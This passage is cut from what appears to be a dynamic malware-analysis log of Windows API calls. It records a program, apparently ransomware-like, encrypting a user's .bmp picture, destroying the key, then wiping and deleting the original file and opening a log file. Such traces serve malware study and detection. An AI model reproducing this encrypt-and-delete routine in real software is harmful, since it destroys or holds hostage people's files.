lpMsg=0x87e7c4) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.771] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.771] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.771] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.771] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.771] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.772] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1720a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x17210) returned 1 [0190.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.772] CharLowerBuffW (in: lpsz="byte[94737]", cchLength=0xb | out: lpsz="byte[94737]") returned 0xb [0190.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.777] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8d438*, pdwDataLen=0x87e820*=0x1720a, dwBufLen=0x17210 | out: pbData=0xa8d438*, pdwDataLen=0x87e820*=0x17210) returned 1 [0190.781] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.798] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.798] CryptDestroyKey (hKey=0x90af18) returned 1 [0190.799] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.799] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.800] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.800] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0190.802] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0x90ae18 [0190.802] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.803] CharLowerBuffW (in: lpsz="byte[94730]", cchLength=0xb | out: lpsz="byte[94730]") returned 0xb [0190.803] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.803] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.803] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.803] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.804] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.805] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.805] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\rcum7ulgy1kxh5mcjre6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0190.805] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.806] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.806] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.807] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.807] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.807] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.807] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.807] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFilePart=0x0) returned 0x50 [0190.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x16f1c440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0x90ae18 [0190.807] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\rcum7ulgy1kxh5mcjre6.bmp")) returned 1 [0190.810] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x16f1c440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0 [0190.810] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.813] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.814] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.814] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.814] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.815] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.815] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.815] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.815] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.815] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, 